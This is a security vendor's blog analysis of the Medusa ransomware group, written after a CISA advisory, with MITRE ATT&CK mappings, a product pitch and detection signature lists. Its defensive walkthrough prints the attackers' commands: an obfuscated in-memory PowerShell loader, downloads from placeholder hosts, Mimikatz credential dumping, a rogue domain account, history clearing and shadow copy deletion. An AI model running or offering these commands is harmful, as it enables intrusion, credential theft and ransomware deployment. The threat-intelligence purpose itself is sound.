Huseyin Can YUCEEL | March 13, 2025 | 8 MIN READ

LAST UPDATED ON MARCH 14, 2025

Medusa Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-071A

On March 12, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Medusa ransomware [1]. Medusa ransomware emerged as Ransomware-as-a-Service in June 2021 and gained infamy by compromising over 300 victims from critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, legal, and technology. 

In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Medusa ransomware and how organizations can defend themselves against Medusa ransomware attacks.

Medusa Ransomware-as-a-Service Group

Medusa is a ransomware-as-a-service (RaaS) group that has been active since June 2021. Initially, Medusa operated as a closed ransomware variant controlled by a single group, but it later evolved into an affiliate-based model. Despite this shift, the core Medusa developers still retain control over important operations like ransom negotiations. Medusa threat actors employ a double extortion strategy, where they encrypt victim data and threaten to release it publicly unless the ransom is paid.

The group primarily targets organizations across various critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, legal, and technology. Their victims range from large enterprises to smaller businesses, demonstrating a broad and opportunistic targeting approach. 

Medusa's motivations are primarily financial. Their ransom demands vary widely, with some victims required to pay millions of dollars to regain access to their data. They also engage in direct negotiation tactics, contacting victims via phone or email to increase pressure. Additionally, Medusa actors operate a data leak site where they auction stolen data to third parties before the ransom deadline expires. In some cases, victims who pay the ransom have been targeted again with further extortion attempts, suggesting that Medusa actors may engage in triple extortion tactics.

The group's modus operandi involves infiltrating a network, identifying valuable data, and deploying ransomware to encrypt files. Medusa affiliates gain initial access through multiple techniques, often relying on initial access brokers (IABs) who sell access to compromised networks. These brokers use phishing campaigns to steal credentials and exploit unpatched software vulnerabilities. Known exploits include vulnerabilities in remote access tools such as ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788). Once inside, the attackers use living-off-the-land binaries (LoLBin) and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for network discovery and lateral movement. They use living-off-the-land (LOTL) techniques to evade detection, leveraging built-in Windows tools like PowerShell and Windows Management Instrumentation (WMI). They also attempt to disable security software using bring-your-own-vulnerable-driver (BYOVD) techniques. Exfiltrated data is stored on Medusa-controlled servers and is used to pressure victims to pay the demanded ransom.

Medusa Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1190 Exploit Public Facing Applications

Medusa threat actors exploit unpatched software vulnerabilities to gain initial access to target environments. Organizations are advised to apply patches promptly to mitigate this risk.

Affected Product

Vulnerability

CVSS Score

ConnectWise ScreenConnect

CVE-2024-1709

10.0 (Critical)

Fortinet EMS

CVE-2023-48788

9.8 (Critical)

T1566 Phishing

Medusa affiliates frequently use phishing campaigns to steal user credentials and gain access to target environments. These campaigns often involve deceptive emails with malicious attachments or links leading to credential-harvesting websites.

Execution

T1059.001 Command and Scripting Interpreter: PowerShell

Medusa threat actors use PowerShell command given below to execute malicious scripts and establish persistence. This command also runs an obfuscated payload in memory to avoid detection.

powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('<base64_payload>'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

T1059.003 Command and Scripting Interpreter: Windows Command Shell

Medusa threat actors utilize the Windows Command Shell (cmd.exe) to execute malicious commands, perform reconnaissance, disable security defenses, and deploy ransomware across victim networks.

cmd.exe /c net share
cmd.exe /c sc query
cmd.exe /c schtasks

T1047 Windows Management Instrumentation

Medusa actors abuse WMI to gather information about system processes, users, and network configurations. The command below extracts printer configurations, which can be useful for identifying networked devices.

wmic printer get caption,name,deviceid,drivername,portname

wmic printjob

Persistence

T1136.002 Create Account

Medusa actors create new user accounts to maintain persistence. The command below creates a new user account with administrative privileges.

net user /add default <password> /domain 

Defense Evasion

T1070.003 Indicator Removal: Clear Command History

To avoid detection, Medusa actors delete traces of their activities by erasing PowerShell command line history. The command below deletes the PowerShell command history file, making forensic investigations more difficult.

powershell Remove-Item (Get-PSReadlineOption).HistorySavePath

T1027.013 Obfuscated Files or Information: Encrypted/Encoded File

Medusa actors obfuscate scripts and payloads to evade detection by security tools. They manipulate PowerShell and batch scripts to hide malicious commands. This technique splits and concatenates a command to bypass signature-based detection.

powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<malicious_file>.msi)

T1562.001 Impair Defenses: Disable or Modify Tools

Medusa threat actors also modify firewall rules to allow inbound RDP connections.

netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow

Discovery

T1046  Network Service Discovery & T1016 System Network Configuration Discovery

Medusa threat actors use legitimate administrative tools to identify active hosts, open ports, and services running on the victim's network. They also use network scanning tools like Advanced IP Scanner and SoftPerfect Network Scanner to map the internal network. The command below retrieves detailed network configuration, including IP addresses, gateway settings, and DNS servers.

netstat -a
ipconfig /all

T1135 Network Share Discovery

Medusa actors identify shared network drives to spread ransomware and steal data. The command below lists available network shares on a remote system.

net share

T1082 System Information Discovery

Medusa actors collect system details such as OS version, installed software, and system architecture. The command below gathers detailed system information to tailor attacks.

systeminfo

echo Computer: %COMPUTERNAME%

echo Username: %USERNAME%

echo Domain: %USERDOMAIN%

echo Logon Server: %LOGONSERVER%

echo DNS Domain: %USERDNSDOMAIN%

echo User Profile: %USERPROFILE%

echo System Root: %SYSTEMROOT%

driverquery

 

T1069.002 Permission Groups Discovery: Domain Groups

Medusa actors enumerate Active Directory domain groups to identify privileged accounts. The command below lists members of the Domain Admins group, which can be targeted for privilege escalation.

net group "Domain Admins" /domain

Credential Access

T1003.001 OS Credential Dumping: LSASS Memory

Medusa affiliates use Mimikatz to dump credentials from the Local Security Authority Subsystem Service (LSASS), allowing them to escalate privileges and move laterally within the network. The command below extracts plaintext passwords and NTLM hashes from LSASS memory.

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Lateral Movement

T1072 Software Deployment Tools

Medusa threat actors use software deployment tools like PDQ Deploy and BigFix to distribute ransomware across networks.

T1021.001 Remote Services: Remote Desktop Protocol

Medusa threat actors use compromised credentials to access systems via RDP, enabling them to move laterally within the victim's network.

mstsc.exe /v:{hostname/ip} /u:{user} /p:{password}

Exfiltration

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Medusa threat actors used rclone to exfiltrate their victims' sensitive data to the Medusa C2 servers.

Command and Control

T1071.001 Application Layer Protocol: Web Protocols

Medusa threat actors use HTTPS to communicate with command-and-control (C2) servers and exfiltrate data. 

T1219 Remote Access Software

Medusa threat actors use legitimate remote access tools like AnyDesk to maintain control over compromised systems.

T1105 Ingress Tool Transfer

Medusa threat actors transfer malicious tools and payloads into victim environments to facilitate their operations, including credential dumping, remote access, and ransomware deployment. They often use certutil, PowerShell, and PsExec to download and execute tools while evading security controls.

certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll
certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi

Impact

T1486  Data Encrypted for Impact

Medusa ransomware encrypts victim data using AES-256 encryption and appends the .medusa extension to affected files. The encryptor process, gaze.exe, is deployed to encrypt files and drop ransom notes.

psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe"

T1490  Inhibit System Recovery

Medusa threat actors delete volume shadow copies to prevent recovery.

vssadmin delete shadows /all /quiet

How Picus Helps Simulate Medusa Ransomware Attacks?

We also strongly suggest simulating Medusa ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as HellCat, Ghost, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Medusa ransomware

Threat ID

Threat Name

Attack Module

31340

Medusa Ransomware Campaign

Windows Endpoint

72791

Medusa Ransomware Download Threat

Network Infiltration

66692

Medusa Ransomware Email Threat

Email Infiltration (Phishing)

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Medusa ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Medusa ransomware:

Security Control

Signature ID

Signature Name

Check Point NGFW

0920BA626

Ransomware.Win32.Medusa.TC.5a8fkYQw

 

0F31EFFFA

Ransomware.Win32.Medusa.TC.de3cwwcz

 

0B7282E76

Trojan.Win32.Imps.TC.bfb4UCRQ

 

090BB1A2E

Ransomware.Win32.Medusa.TC.b20eAyZa

 

0808FEF5A

Ransomware.Win32.Medusa.TC.2d62ZwaZ

Cisco FirePower

1.49569.1

MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt

Forcepoint NGFW

 

File_Malware-Blocked 

Fortigate AV

10126105

W32/Filecoder.MEDU!tr.ransom

Fortigate AV

10127337

W32/Filecoder_Medusa.A!tr.ransom

Palo Alto

624270429

Ransom/Win32.medusa.h

 

572533496

ransomware/Win32.rents.u

 

624270495

Ransom/Win32.medusa.j

 

609797718

ransomware/Win32.medusa.g

 

624270456

Ransom/Win32.medusa.i

Trellix

0x4840c900

MALWARE: Malicious File Detected by GTI

Snort

1.49569.1

MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trialof the Picus Security Validation Platform.

References

[1] "#StopRansomware: Medusa Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a

Table of Contents